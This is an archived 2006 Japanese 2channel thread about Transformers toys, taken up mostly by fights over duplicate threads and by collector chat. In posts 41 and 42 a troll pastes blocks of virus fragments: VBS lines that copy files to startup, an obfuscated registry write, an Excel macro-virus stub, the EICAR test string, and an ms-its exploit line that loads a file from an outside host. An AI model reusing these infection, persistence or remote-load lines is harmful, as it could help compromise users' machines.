5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

トランスフォーマースレッドPART175

1 :ぼくらはトイ名無しキッズ:2006/12/11(月) 10:44:46 ID:Y3jLO81k0
以下はこのスレのルールです。
・以下の人は出入り禁止。また話題・苦情等リアクションも禁止(削除依頼へ)。
 ●ご本人様他、変なスレを立てて誘導する人
 ●いたち、もえるゆきだるま、乱筆魔王
 ●新板だ盗品だTFヲタだ喚く人
・特定個人に対する、晒し・叩き・ハァハァ等の行為は厳禁。速攻で削除要請します。
・実況禁止。専用スレッドへ誘導しましょう。
・所定のテンプレを使用していないスレは削除依頼を出し、徹底放置で。
・スレ立て権は事前にトリップ付発言のあるトリップ付950(ID不可)
  いなかったら960,970…の順。
・950踏んでから10分で立たなかったら、上に準じて960,970…の順でよろ。
・ホスト規制で建てられなかったら必ず報告して、次の人を任命。
・ただし、950,960,970…がいずれも荒らし目的で踏まれたと思われる場合は、
その都度、臨機応変に対処しましょう。

前スレ(実質174)
http://hobby7.2ch.net/test/read.cgi/toy/1162084914/

関連サイト
トランスフォーマー公式サイト http://www.takaratomy.co.jp/products/TF/
e-HOBBY SHOP               http://www.e-hobby.co.jp/
トランスフォーマー画像掲示板      http://transformers.hp.infoseek.co.jp/index.htm

2 :ぼくらはトイ名無しキッズ:2006/12/11(月) 10:45:51 ID:Y3jLO81k0
■関連スレ■

【トランスフォーマー・キスぷれv】 その3
http://hobby7.2ch.net/test/read.cgi/toy/1161654289/
■トランスフォーマー総合スレ Part2■
http://hobby7.2ch.net/test/read.cgi/toy/1148727835/
トランスフォーマー投げ売り情報交換スレ
http://hobby7.2ch.net/test/read.cgi/toy/1159172273/
【海外版】TRANSFORMERSwave25【HASBRO】+G.I.Joe
http://hobby7.2ch.net/test/read.cgi/toy/1162477372/
†††† トランスフォーマー葬式会場 ††††
http://hobby7.2ch.net/test/read.cgi/toy/1141487734/
出来悪すぎなトランスフォーマー
http://hobby7.2ch.net/test/read.cgi/toy/1157877950/
トランスフォーマー鈴屋ヲチスレ
http://hobby7.2ch.net/test/read.cgi/toy/1146417465/

3 :ぼくらはトイ名無しキッズ:2006/12/11(月) 10:46:57 ID:Y3jLO81k0
【トランスフォーマー】プライマス難民集結スレッド【善神】
http://hobby7.2ch.net/test/read.cgi/toy/1141652260/
【カバヤ】トランスフォーマーの食玩2【ガム】
http://hobby7.2ch.net/test/read.cgi/toy/1140335904/
トランスフォーマーにロボットベース希望
http://hobby7.2ch.net/test/read.cgi/toy/1127122492/
トランスフォーマー逝って良し
http://hobby7.2ch.net/test/read.cgi/toy/1136958540/
スターウォーズトランスフォーマーを語るスレ
http://hobby7.2ch.net/test/read.cgi/toy/1137133675/
トランスフォーマーマイクロン伝説惨敗原因検証スレ
http://hobby7.2ch.net/test/read.cgi/toy/1071397843/
○○にあのトランスフォーマーを!!
http://hobby7.2ch.net/test/read.cgi/toy/1156313741/
■トランスフォーマー復刻専用スレPart19■
http://hobby7.2ch.net/test/read.cgi/toy/1160913945/
オリジナルのトランスフォーマーを考えてみる
http://hobby7.2ch.net/test/read.cgi/toy/1137584400/
こんなトランスフォーマーは嫌だ!!
http://hobby7.2ch.net/test/read.cgi/toy/1162878047/

4 :ぼくらはトイ名無しキッズ:2006/12/11(月) 11:57:18 ID:uQfE0OeM0
トランスフォーマースレPART169・173(実質174・175)
http://hobby7.2ch.net/test/read.cgi/toy/1165403739/l50

5 :ぼくらはトイ名無しキッズ:2006/12/11(月) 12:55:44 ID:cIg0Tu9E0
>>4
ゲロが立てたスレになんか誰が行くか

6 :ぼくらはトイ名無しキッズ:2006/12/11(月) 13:51:28 ID:DInrU98D0
>>1-3
乙&GJ!

やっと、まともなスレタイになったね。(´∀`)

7 :ぼくらはトイ名無しキッズ:2006/12/11(月) 17:20:08 ID:XhyWaFLFO
突然の書き込み失礼します
東京都内で日本版のエクシリオンとエクシゲイザーを探しています
本日、アキバを少しマワってみたのですが海外版の高価な品しか見つかりませんでした
定価くらいで購入できればと思っています
情報のある方がいましたらどうぞよろしくお願いいたします

8 :ぼくらはトイ名無しキッズ:2006/12/11(月) 17:20:54 ID:RivuLmyf0
ttp://hk.myblog.yahoo.com/jw!_veuUfCRGAWrg4Yh5fHHppkdSmv8eCE-/article?mid=2976

9 :ぼくらはトイ名無しキッズ:2006/12/11(月) 20:09:21 ID:BYUwPEqO0
>>7
リバティーとかちょくちょく覗いてれば捨て値で手に入ると思うけど

10 :ぼくらはトイ名無しキッズ:2006/12/11(月) 20:31:55 ID:CE6qqBnP0
ttp://e-hobby.co.jp/side/question.html
>その他、ご意見ご感想などございましたらお書きください。

クラシック国内販売

11 :ぼくらはトイ名無しキッズ:2006/12/11(月) 20:40:28 ID:fz6rYOo60
また妙なテンプレが増えてるのか

12 :ぼくらはトイ名無しキッズ:2006/12/11(月) 20:44:06 ID:fz6rYOo60
誘導
トランスフォーマースレPART169・173(実質174・175)
http://hobby7.2ch.net/test/read.cgi/toy/1165403739/

13 :ぼくらはトイ名無しキッズ:2006/12/11(月) 20:52:15 ID:fz6rYOo60
もういっちょ誘導
トランスフォーマースレッドPART175
http://hobby7.2ch.net/test/read.cgi/toy/1165837738/

14 :ぼくらはトイ名無しキッズ:2006/12/11(月) 21:25:02 ID:pCe4GY+d0
>>7
ヤフオクとか当った方が良いんじゃいか。
定期的に安く出品されてるよ。送料入れても定価より安い。

15 :ぼくらはトイ名無しキッズ:2006/12/11(月) 21:25:25 ID:29i1mkq+0
ネタもないのにスレだけ増やしたがるのがTFヲタの悪い癖

16 :ぼくらはトイ名無しキッズ:2006/12/11(月) 21:27:00 ID:lYd4Ugn+0
※無駄に増やしてるヴァカはTFスレ住人は一切関知する所ではありません。

17 :ぼくらはトイ名無しキッズ:2006/12/11(月) 21:28:39 ID:29i1mkq+0
974 :ぼくらはトイ名無しキッズ:2006/12/11(月) 17:39:33 ID:pCe4GY+d0
484 :ぼくらはトイ名無しキッズ:2006/12/11(月) 17:49:52 ID:pCe4GY+d0
働け無職

18 :ぼくらはトイ名無しキッズ:2006/12/11(月) 21:34:35 ID:7jGh16cK0
>>16
このスレ立てたのはTFヲタだろ
もの考えてから喋れ


19 :ぼくらはトイ名無しキッズ:2006/12/11(月) 21:42:36 ID:0KrieywS0
これも貼っておかなきゃ

ゾイド板避難所
http://hobby8.2ch.net/test/read.cgi/zoid/1157257550/

20 :ぼくらはトイ名無しキッズ:2006/12/11(月) 22:14:07 ID:j8C73Rau0
>>18
このスレ立てた奴もTFファンじゃない。

理由1
ゾイド板のリンクを省いているのに、それ以外のゲロが立てた糞スレは全て載せている。
つまり前スレでゲロがどうのこうの言ってはいたが、実際にはゲロ嫌悪で立て直した訳では無い。
トランスフォーマーで検索出来る物を片っ端から載せてるだけで、内容や経歴を全く知らない奴だ。
理由2
貼ったリンクが既にDat落ちしている。
つまり大半のリンクは過去ログから転載した物でチェックすらしていない。
理由3
前スレで全くスレ立ての話や流れも無かったのに、突然立てている。
しかも現在では復刻スレでしか使って無いテンプレを
何故か流用している。
いたち、もえるゆきだるまなんてコテハンや
・特定個人に対する、晒し・叩き・ハァハァ等の行為は厳禁なんてルールは
今の奴には判らないだろ?

これらの要素加えて、現在立っている新スレと
このスレの違いを比較し、そこから推測出来るの理由は一つしかない。
>>1にゾイド板のリンクが有るか無いかだけ。
それ以外は、新スレっぽく見せかけてるだけで
>>1は、まるでTFスレの内容を把握していない。
これゾイド板から来た愉快犯の仕業だ。
大方ゾイド板のリンクが目障りに感じたから
スレを乱立させて混乱させるのが目的だろ。

21 :ぼくらはトイ名無しキッズ:2006/12/11(月) 22:14:59 ID:DInrU98D0
>>12>>13
ゲロが立てたスレになど誰が行くかっつーの!

22 :ぼくらはトイ名無しキッズ:2006/12/11(月) 22:26:33 ID:0KrieywS0
ゾイド板避難所
http://hobby8.2ch.net/test/read.cgi/zoid/1157257550/

これを何度も貼ってやれば>>1は大喜びって事か
どうせTFスレ削除拒否されるから
結局全スレ埋めなきゃならん

23 :ぼくらはトイ名無しキッズ:2006/12/11(月) 22:39:03 ID:7jGh16cK0
つーか>>1に賛同した奴の大半が単発このスレ限定1回限りの単発IDなんだがw

24 :ぼくらはトイ名無しキッズ:2006/12/11(月) 22:52:21 ID:jqqPVo050
どうなんだろか

25 :ぼくらはトイ名無しキッズ:2006/12/11(月) 23:20:34 ID:0KrieywS0
>>20
つーかさ決定的な理由がもう一つあるじゃん
立てた馬鹿が本当にTFヲタの善意から出たものなら
意図的に重複スレを立てた場合は同時に削除依頼もするだろ
>>1はそれすらしてない。
前にいつまで経っても使われずに残ってた重複スレを立てたゾイダーがいたじゃん
あいつの犯行だろ。

26 :7です:2006/12/11(月) 23:23:37 ID:XhyWaFLFO
エクシリオンとエクシゲイザーについて
アドバイスいただいた方々ありがとうございます!!
もう少し時間をかけながら探してみますネ
本当にありがとうございました!!


27 :ぼくらはトイ名無しキッズ:2006/12/11(月) 23:28:22 ID:0KrieywS0
携帯使って自演かよwwwwwwwww

28 :ぼくらはトイ名無しキッズ:2006/12/11(月) 23:45:13 ID:jqqPVo050
必死な奴がいるようだ

29 :ぼくらはトイ名無しキッズ:2006/12/11(月) 23:53:27 ID:fz6rYOo60
もういっちょ誘導
トランスフォーマースレッドPART175
http://hobby7.2ch.net/test/read.cgi/toy/1165837738/

30 :ぼくらはトイ名無しキッズ:2006/12/12(火) 00:51:41 ID:VugTfxA80
なんというか。
本当に勤勉だなぁ……、

31 :ぼくらはトイ名無しキッズ:2006/12/12(火) 01:40:35 ID:Isv3/ZXD0
この情熱を別のベクトルに傾けられれば大成すると思うよ。

32 :ぼくらはトイ名無しキッズ:2006/12/12(火) 06:16:57 ID:Q7oWyafZ0
h
ttp://moepic3.dip.jp/gazo/remodk/files/remodk2517.jpg
勉強してみた

33 :ぼくらはトイ名無しキッズ:2006/12/12(火) 10:42:46 ID:KPJuM0Dm0
                 ┌─┐
                 |も.|
                 |う |
                 │来│
                 │ね│
                 │え .|
                 │よ .|
      バカ    ゴルァ  │ !!.│
                 └─┤    プンプン
    ヽ(`Д´)ノ ヽ(`Д´)ノ  (`Д´)ノ    ( `Д)
    | ̄ ̄ ̄|─| ̄ ̄ ̄|─| ̄ ̄ ̄|─□( ヽ┐U
〜 〜  ̄◎ ̄  . ̄◎ ̄   ̄◎ ̄   ◎−>┘◎

34 :ぼくらはトイ名無しキッズ:2006/12/12(火) 12:34:18 ID:TtqR1thq0
前スレ「トランスフォーマースレッドPART172(実質173)」終盤で、正統なテンプレ云々って話があったけど、
それなら画像板内の文字板にある避難所か、或いは運営提案スレッド辺りに載せときゃどうだろう?
あそこならゲロ禁をアク禁にできるし、その上で話し合いが出来そうだけど、どう?

35 :ぼくらはトイ名無しキッズ:2006/12/12(火) 12:36:41 ID:5WLxeVEqO
膿め

36 :ぼくらはトイ名無しキッズ:2006/12/12(火) 19:46:03 ID:aRG9hJRg0
そういう話はたびたび持ち上がるんだけど、
みんな消極的で事なかれ主義で自治が嫌いだから長続きしないのよね

37 :ぼくらはトイ名無しキッズ:2006/12/12(火) 20:19:10 ID:VugTfxA80
まあ実際、暇な時に話ができる場でさえあればいいわけで
普通、そこまで熱心に2CHのスレを守ろうとする人はいないわな。

38 :ぼくらはトイ名無しキッズ:2006/12/12(火) 20:29:17 ID:qXkGuEraO
試しあげ

39 :ぼくらはトイ名無しキッズ:2006/12/12(火) 20:42:05 ID:+l/0MFFu0
ttp://tformers.net/g/albums/6872/DSC06637.JPG
ttp://tformers.net/g/albums/6872/DSC06651.JPG
メガトロンが蛙のようだ

40 :ぼくらはトイ名無しキッズ:2006/12/12(火) 20:45:19 ID:VugTfxA80
オクで見かけないんだけど、これもう発売されてるの?

41 :ぼくらはトイ名無しキッズ:2006/12/12(火) 21:08:13 ID:I2IFb2kl0
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

42 :ぼくらはトイ名無しキッズ:2006/12/12(火) 21:08:33 ID:I2IFb2kl0
<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

43 :ぼくらはトイ名無しキッズ:2006/12/12(火) 21:17:39 ID:1Atb6xQ70
>>39
スパリンコンバットロンのブロウルみたいだな


44 :ぼくらはトイ名無しキッズ:2006/12/12(火) 21:33:36 ID:VxSu5zBL0
>>1
削除依頼はどうした?

45 :ぼくらはトイ名無しキッズ:2006/12/12(火) 21:49:39 ID:jselX/y/0
誘導
トランスフォーマースレッドPART175
http://hobby7.2ch.net/test/read.cgi/toy/1165837738/

46 :ぼくらはトイ名無しキッズ:2006/12/12(火) 21:51:23 ID:jselX/y/0
>>44
したって消してもらえない
しかも>>1は完全な立て逃げ

47 :ぼくらはトイ名無しキッズ:2006/12/12(火) 22:52:06 ID:rGHWgYWR0
ここがいい。

48 :ぼくらはトイ名無しキッズ:2006/12/12(火) 23:10:59 ID:x97F8W5y0
ウィルスコードまで張るくらい、このスレ使われるのが嫌なのか。

49 :ぼくらはトイ名無しキッズ:2006/12/12(火) 23:21:04 ID:0x2ybw0SO
携帯からなんだけどウィルスコードってどんな被害出るの?

50 :ぼくらはトイ名無しキッズ:2006/12/12(火) 23:23:51 ID:jselX/y/0
>>49
見ると死ぬんだよ

51 :ぼくらはトイ名無しキッズ:2006/12/12(火) 23:23:52 ID:Isv3/ZXD0
ノートン入れてる人は反応する。それ位。

52 :ぼくらはトイ名無しキッズ:2006/12/12(火) 23:35:40 ID:x97F8W5y0
>>50
なんでこのスレだけ上げないの?

53 :ぼくらはトイ名無しキッズ:2006/12/12(火) 23:38:27 ID:jselX/y/0
嫌いだから

54 :ぼくらはトイ名無しキッズ:2006/12/12(火) 23:42:05 ID:jselX/y/0
上げない以外は全スレに書き込む
どうせ削除されないのだから
さっさと使い切るに限る

55 :ぼくらはトイ名無しキッズ:2006/12/12(火) 23:49:24 ID:0x2ybw0SO
>>50-51
サンクス

56 :ぼくらはトイ名無しキッズ:2006/12/13(水) 03:41:43 ID:AWBRvjaQ0
>>39
初見の時はG2メガトロンのリメイクかなと思ったけど、
カラーリングはマイ伝メガトロンに似てるな。

57 :ぼくらはトイ名無しキッズ:2006/12/13(水) 06:08:59 ID:GfLu6UJW0
立った順に見て、
@http://hobby7.2ch.net/test/read.cgi/toy/1165403739/
 前スレ800番台で早漏が立てた。
 スレ番が混乱を招く。明らかに故意。
Aこのスレ(http://hobby7.2ch.net/test/read.cgi/toy/1165801486/
 前スレ965が立てた。
Bhttp://hobby7.2ch.net/test/read.cgi/toy/1165837738/
 上記Aの存在を知ってて立てた。
 >1に「俺も立ててみる」とか明らかに乱立が目的。

@ABのうち、誰がゲロでTFファンでゾイダーか、を知る術は基本的に無い。
立った経緯だけで見てもAのここを使い、他は削除依頼でおk。

少なくとも
 ・ウイルスコードを張るゴミ(I2IFb2kl0)
 ・他のスレ両方ageるクズ(jselX/y/0)
  (↑自分が本スレと思う片方じゃなく、両方をageてるので悪意確定)
の2名(1名か?w)にとって都合が悪いというだけでも、
他住人にとってはここを本スレにする価値がある。
荒らしだって誰だって、人間苦痛なことは長くは続けられない。
荒らしが喜ぶ結果(乱立、ファンが混乱、分散による過疎、そいつが立てたスレ毎回使う)
を出すからずーっと粘着できてるわけで。

今回は、2ch(匿名掲示板)としては特に例外的に
「荒らしに対する、管理者でない他住人が取れる有効で明確な措置」
として「このスレを使う」って方法があるわけだから、各自是非実践を望む。

58 :ぼくらはトイ名無しキッズ:2006/12/13(水) 08:20:37 ID:HclEhXBb0
虫が群がる野菜ほど良い野菜って事か

59 :ぼくらはトイ名無しキッズ:2006/12/13(水) 12:09:15 ID:UGNA0aXf0
もしかしたらスレ違いかもって思うんだけど、ちょっとここで聞いてみたいので。
『TFファンが認めるオススメ戦隊ロボ』ってなんかある?
戦隊ロボってこれまで敬遠してたんだけど、リサイクルショップでバクレンオーアナザーカラーバージョンってのを買ってみたら案外良かったんで。
TFと戦隊ロボって明らかに狙ってる場所が違うと思うんだけど、「TFファンの目から見ても」良い品ってのもあるのかなーと思って。
スレ違いだって声が多いようなら諦めますが……もしよろしければお願いいたします。

60 :ぼくらはトイ名無しキッズ:2006/12/13(水) 12:16:11 ID:g7h8nWrs0
スレ違いなんて言うつもりはないけど
TFと言うカテゴリの中だけですら多種多様のTF好きが存在し
戦隊ロボだけでも多種多様の商品が存在してるのに
善し悪しも個々の感覚的な物が大きいのに聞いて参考になる?

戦隊ロボに手を出したいのなら自分の好みに合う商品を自分で吟味するしか

61 :ぼくらはトイ名無しキッズ:2006/12/13(水) 12:43:10 ID:TysxYmm70
いきなり正論(^^;

実際、以前も「どんなTF商品が好みか」なんて話で盛り上がった事があったけど、
ほんっとうに色んな方向性・色んな嗜好が出てきたもんな。
因みにその時に俺が書き込んだ内容の一部を抜粋。

  …だから俺、バンダイ商品ってあんま好きじゃないんだよね。
  数少ない例外が、タイムロボ・ガオキング・ダイボウケン。

62 :ぼくらはトイ名無しキッズ:2006/12/13(水) 12:52:58 ID:d/gXN31S0
いや、だから、「だから」の前が無いと意味がとれないだろソレw

63 :ぼくらはトイ名無しキッズ:2006/12/13(水) 12:58:26 ID:uIgln3eJ0
とりあえずダイボウケン推しとこう。
変形合体こなしてよく動くし、拡張合体他の遊びの幅も広い。
なにより現行商品なんで割りと買いやすいしね。
あとはエンブレム貼って合体戦士としてごまかせそうなVRVロボ。無理か。
単体ビークル→ロボ→合体ロボとこなせる唯一の(…だったかな)戦隊ロボだし。

64 :ぼくらはトイ名無しキッズ:2006/12/13(水) 13:00:37 ID:T+sn740X0
>>59
>バクレンオーアナザーカラーバージョン

そんなもんは無い。
アナザーが出てたのはアバレンオーかキラーオーだけだった筈。

ちなみに、俺が好きだったのはマジキングとウルカイザーかな。
複雑な変形をする割に合体前、合体後ともにプロポーションにほとんど波状が無いのがいい。

スレ違いスマソ

65 :ぼくらはトイ名無しキッズ:2006/12/13(水) 13:52:09 ID:HclEhXBb0
タイムロボ+シャドウがおすすめ
各ジェットのコックピットが開いて人形入れられるし、形態のバリエーションもかなりのもの
タイムシャドウの変形は戦隊ロボというよりTFチックで面白いよ

66 :ぼくらはトイ名無しキッズ:2006/12/13(水) 13:53:10 ID:bEsP4O7fO
TFファン公認ってものはないと思うけど、TFファンの俺個人が好きなのは
(挙がってる以外だと)大連王の中の人、龍星王。
合体前に小ロボになれる、たぶん初の1号ロボで、変形モチーフも古今類をみない東洋龍。
ちょい組み換えはあるが、バラバラ変形ってほどではない。

67 :ぼくらはトイ名無しキッズ:2006/12/13(水) 15:10:31 ID:JmZ8udOY0
>>59
俺はTFメインだけど戦隊ロボもほぼ全て買ってるよ。
最近のでオススメを言うと
マジキング、轟雷旋風神、タイムロボ、ガオレン関係は
結構変形や組み換えが楽しい。

慣れが必要だけど個人的リモコンロボ殿堂入りの
VレックスもTFとはまた別の魅力があっていいよ。

68 :ぼくらはトイ名無しキッズ:2006/12/13(水) 15:19:00 ID:F63v3af60
多分TFファンでも、今年の商品数の少なさから戦隊ロボに手を出した人って
少なくないだろうね。俺も生まれて初めて黒大冒険買ってしまったし。
TFとは全く違うし、可動は初代コンボイ並だがあれはあれでいいと思った。
個人的な感想だが、子供が弄るんならタカラTFよりバンダイの方が楽しいのかな?
って思わなくも無かった。

69 :ぼくらはトイ名無しキッズ:2006/12/13(水) 17:08:04 ID:2Mo7Xi7z0
ダイボウケンをショックウェーブになぞらえたTFにしてみるとか。

分離形態 → 空母形態 → ロボット形態
分離形態 → トレーラー形態 → ロボット形態

トレーラー→ロボットが変形と言うより壮絶な組み換えになるのがすこし厳しいか。

70 :ぼくらはトイ名無しキッズ:2006/12/13(水) 17:14:56 ID:gerpfxRRO
可動重視ならダイボウケン、魂バトルフィーバーロボ
合体の醍醐味ならマジキング
手足組み換え上等ならガオキング以下パワーアニマル、ダイボウケン以下ゴーゴービークル
パトランプフェチならデカレンジャーロボ
なんか回るのが好きなら旋風神

71 :ぼくらはトイ名無しキッズ:2006/12/13(水) 19:37:55 ID:AWBRvjaQ0
みんな結構戦隊ロボも買ってるのね。
俺は幼少の頃に親に買ってもらったっきりで自分で買ったこと無いや。
試しに今度何か買ってみようかしら。

来年の国内TF事情がある程度分かってくれば良いんだが、ビースト10thなり
クラシックなりがドバッと来る可能性もあるから、資金も残しておかないと
いけないし、口だけになりそうだけど。w
MPメガトロンも発売日には必ず手にしたいからナ〜。

72 :ぼくらはトイ名無しキッズ:2006/12/13(水) 20:42:40 ID:EQNFXlFa0
>>57
寝言寝てから言え蛆虫
てめえで重複スレおっ立てといて後は他力本願ってか?
なんでもかんでも人任せ
芸も知識も経験も無い癖に口だけはリーダー気取りか?

73 :ぼくらはトイ名無しキッズ:2006/12/13(水) 20:58:35 ID:zioQuzBk0
ttp://tformers.net/g/albums/6875/DSC09647.JPG
かっこ良くなりそうな色使ってるのに微妙

74 :ぼくらはトイ名無しキッズ:2006/12/13(水) 21:05:23 ID:IC5pbRgZ0
確かに。悪くはないんだけど何か違う感じが。

75 :ぼくらはトイ名無しキッズ:2006/12/13(水) 21:07:01 ID:qyG9Nbiy0
誘導
トランスフォーマースレッドPART175
http://hobby7.2ch.net/test/read.cgi/toy/1165837738/

76 :ぼくらはトイ名無しキッズ:2006/12/13(水) 21:08:36 ID:qyG9Nbiy0
>>1=57
削除依頼はどうした?

77 :ぼくらはトイ名無しキッズ:2006/12/13(水) 21:09:22 ID:bEsP4O7fO
確かにw赤黒配色なんて、とりあえず悪くしてカコイイ! の定番なのにね。
ギャラコンが正義っぽすぎるのと、腕がそもそもキツイ(これは言いっこなしか?)せいかな。

78 :ぼくらはトイ名無しキッズ:2006/12/13(水) 21:11:48 ID:qyG9Nbiy0
こっちにも誘導
トランスフォーマースレPART169・173(実質174・175)
http://hobby7.2ch.net/test/read.cgi/toy/1165403739/

79 :ぼくらはトイ名無しキッズ:2006/12/13(水) 21:16:48 ID:qyG9Nbiy0
なあ削除依頼はどうした?>>1

80 :ぼくらはトイ名無しキッズ:2006/12/13(水) 21:18:24 ID:bEsP4O7fO
>jselX/y/0=qyG9Nbiy0

81 :ぼくらはトイ名無しキッズ:2006/12/13(水) 21:19:14 ID:qyG9Nbiy0
>>80
逃げ回ってないで偉そうな事言うならやる事なれば?

82 :ぼくらはトイ名無しキッズ:2006/12/13(水) 21:22:13 ID:qyG9Nbiy0
ここは荒らしの立てたスレだから誘導に従ってくれ
理由は>>20で証明されてる。

83 :ぼくらはトイ名無しキッズ:2006/12/13(水) 21:22:49 ID:qyG9Nbiy0
誘導
トランスフォーマースレッドPART175
http://hobby7.2ch.net/test/read.cgi/toy/1165837738/
トランスフォーマースレPART169・173(実質174・175)
http://hobby7.2ch.net/test/read.cgi/toy/1165403739/

84 :ぼくらはトイ名無しキッズ:2006/12/13(水) 21:26:47 ID:zioQuzBk0
ふっ、必死だなID:qyG9Nbiy0

85 :ぼくらはトイ名無しキッズ:2006/12/13(水) 21:33:07 ID:qyG9Nbiy0
ころころID換えてage時と他スレを荒らしに行く時だけ携帯になる馬鹿よりマシ

86 :ぼくらはトイ名無しキッズ:2006/12/13(水) 21:46:45 ID:bEsP4O7fO
とりあえずjselX/y/0=qyG9Nbiy0は、自分が荒しじゃないって主張するんなら
自分なりにでいいので本スレを定めて、誘導もageもそっち一方に絞って下さい。

2スレをageるあなたの行動は、自分の立てた(ゾ板URL入り)スレは2つともageて
乱立状態を維持しつつ、まともなテンプレのここだけ気に入らないから落とそうとしてると推定される。
そして恐らくそれは事実で、あなたは荒しであるので、あなたに従ういわれはない。


87 :ぼくらはトイ名無しキッズ:2006/12/13(水) 21:49:29 ID:qyG9Nbiy0
大きなお世話。
携帯使って逃げてるだけ、しかも正当と言いつつ自分で削除依頼もしない>>1
どうせ削除されないなら全部埋めるだけだ。

88 :59:2006/12/13(水) 21:58:11 ID:Dgn5NNfa0
けっこういろんな戦隊ロボの名前挙がりましたねー
いくつか探してみよう……参考にさせて頂きます

> 自分の好みに合う商品を自分で吟味するしか
まあ最終的にはそうですよね。ここの意見を参考にしながら自分でももっと一生懸命色々探してみます。

あとアナザーバクレンオーじゃなくてアナザーアバレンオーでした。緑色で3体合体のやつ。すんません。

89 :ぼくらはトイ名無しキッズ:2006/12/13(水) 22:02:30 ID:qyG9Nbiy0
それとまともなテンプレって言うのも理解出来ない。
過去ログからそのまま拾って貼っただけで修正やすらしていないのがまともか?
わざわざ煽る為にテンプレにコテハン名を入れるのがまともか?
さらに
>落とそうとしてると推定される
この部分であんたが無知なのがもろバレしてる。
即死判定はとうに過ぎ、Dat落ちの遅い玩具板で落とそうとする?
逆に聞きたいくらいだ。
どうやって落とすんだ?
まさかsageで書き込めば落ちるとでも思ってるのか??
それとも下層に沈むと落ちるとでも思ってるのか?

90 :ぼくらはトイ名無しキッズ:2006/12/13(水) 22:08:04 ID:HclEhXBb0
戦隊ロボの方が子供にも遊ばせやすそうなのは確かだな
ちびっ子にスピード無礼カーとかマッハキック渡してもきちんと遊べるとは思えない

91 :ぼくらはトイ名無しキッズ:2006/12/13(水) 22:08:40 ID:X03asTWw0
>>88
変形が好きとか合体に燃える!とか
動物好きとかプロポーション重視!等など書いてくれれば
お勧めしやすいんじゃがのう

まぁスレ違いになるからこれくらいでいいのかw

92 :ぼくらはトイ名無しキッズ:2006/12/13(水) 22:14:04 ID:qyG9Nbiy0
早く答えろID:bEsP4O7fO
どうすれば他をageると落とせるんだ?

93 :ぼくらはトイ名無しキッズ:2006/12/13(水) 22:24:16 ID:bEsP4O7fO
ごめん、落とすって言い方には明確に語弊があった。
他をageてここを下層においやる、が正しい。訂正します。

だからjselX/y/0=qyG9Nbiy0=kWzHUXUQOも、自分の携帯と一人会話はやめて下さい。


94 :ぼくらはトイ名無しキッズ:2006/12/13(水) 22:30:34 ID:qyG9Nbiy0
つまり無知で馬鹿だった訳だ。

95 :ぼくらはトイ名無しキッズ:2006/12/13(水) 22:45:54 ID:GfLu6UJW0
映画の続報ってないのかな。
サンプルがけっこういいデキなので楽しみなんだが、
海外7月4日確定に対して、
日本公式は2007年しか書いてないのが気になる…
あんまり展開が遅れると、またファン(俺含む)が海外から買っちゃうぜ。

96 :ぼくらはトイ名無しキッズ:2006/12/13(水) 22:51:46 ID:qyG9Nbiy0
携帯止めたのか?ID:bEsP4O7fO

97 :ぼくらはトイ名無しキッズ:2006/12/13(水) 23:01:11 ID:gerpfxRRO
>>95
確かに、俺もそれは危惧してた
「日米同時公開!」って歌ってる訳でもないし

下手に海外先行だとリターンズみたいに
